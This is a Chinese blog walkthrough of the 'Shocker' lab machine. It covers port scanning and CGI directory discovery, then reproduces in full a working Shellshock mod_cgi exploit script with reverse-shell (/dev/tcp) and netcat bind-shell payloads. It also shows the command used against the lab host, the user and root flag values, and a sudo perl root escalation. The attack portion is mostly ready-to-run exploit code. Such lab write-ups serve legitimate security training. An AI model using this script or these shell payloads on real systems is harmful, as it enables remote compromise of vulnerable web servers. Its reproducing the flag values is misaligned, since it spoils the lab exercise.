[Meachines] [Easy] shocker CGI-BIN Shell Shock + P…

2024-08-13 188 0

信息收集

IP Address Opening Ports
10.10.10.56 TCP:80,2222

$ nmap -p- 10.10.10.56 --min-rate 1000 -sC -sV

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CGI-BIN Shell Shock

$ dirb http://10.10.10.56/

[Meachines] [Easy] shocker CGI-BIN Shell Shock + P…插图

$ searchsploit -w apache mod_cgi

[Meachines] [Easy] shocker CGI-BIN Shell Shock + P…插图1

https://www.exploit-db.com/exploits/34900

[Meachines] [Easy] shocker CGI-BIN Shell Shock + P…插图2

#!/usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys

stop = False
proxyhost = ""
proxyport = 0

def usage():
	print """

		Shellshock apache mod_cgi remote exploit

Usage:
./exploit.py var=<value>

Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy

Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)

Example:

./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234

Credits:

Federico Galatolo 2014
"""
	sys.exit(0)

def exploit(lhost,lport,rhost,rport,payload,pages):
	headers = {"Cookie": payload, "Referer": payload}

	for page in pages:
		if stop:
			return
		print "[-] Trying exploit on : "+page
		if proxyhost != "":
			c = httplib.HTTPConnection(proxyhost,proxyport)
			c.request("GET","http://"+rhost+page,headers=headers)
			res = c.getresponse()
		else:
			c = httplib.HTTPConnection(rhost)
			c.request("GET",page,headers=headers)
			res = c.getresponse()
		if res.status == 404:
			print "[*] 404 on : "+page
		time.sleep(1)


args = {}

for arg in sys.argv[1:]:
	ar = arg.split("=")
	args[ar[0]] = ar[1]
try:
	args['payload']
except:
	usage()

if args['payload'] == 'reverse':
	try:
		lhost = args['lhost']
		lport = int(args['lport'])
		rhost = args['rhost']
		payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
	except:
		usage()
elif args['payload'] == 'bind':
	try:
		rhost = args['rhost']
		rport = args['rport']
		payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
	except:
		usage()
else:
	print "[*] Unsupported payload"
	usage()

try:
	pages = args['pages'].split(",")
except:
	pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]

try:
	proxyhost,proxyport = args['proxy'].split(":")
except:
	pass

if args['payload'] == 'reverse':
	serversocket = socket(AF_INET, SOCK_STREAM)
	buff = 1024
	addr = (lhost, lport)
	serversocket.bind(addr)
	serversocket.listen(10)
	print "[!] Started reverse shell handler"
	thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
	serversocket = socket(AF_INET, SOCK_STREAM)
	addr = (rhost,int(rport))
	thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))

buff = 1024

while True:
	if args['payload'] == 'reverse':
		clientsocket, clientaddr = serversocket.accept()
		print "[!] Successfully exploited"
		print "[!] Incoming connection from "+clientaddr[0]
		stop = True
		clientsocket.settimeout(3)
		while True:
			reply = raw_input(clientaddr[0]+"> ")
			clientsocket.sendall(reply+"\n")
			try:
				data = clientsocket.recv(buff)
				print data
			except:
				pass

	if args['payload'] == 'bind':
		try:
			serversocket = socket(AF_INET, SOCK_STREAM)
			time.sleep(1)
			serversocket.connect(addr)
			print "[!] Successfully exploited"
			print "[!] Connected to "+rhost
			stop = True
			serversocket.settimeout(3)
			while True:
				reply = raw_input(rhost+"> ")
				serversocket.sendall(reply+"\n")
				data = serversocket.recv(buff)
				print data
		except:
			pass

$ python2 ./exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.14 lport=10032 pages=/cgi-bin/user.sh

[Meachines] [Easy] shocker CGI-BIN Shell Shock + P…插图3

User.txt

52bf59994f4a8d97df4daa775641ab05

权限提升

$ sudo -l

$ sudo perl -e 'exec "/bin/sh";'

[Meachines] [Easy] shocker CGI-BIN Shell Shock + P…插图4

Root.txt

0bc6d190e24dca08e42174ed7a7ad1a7


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论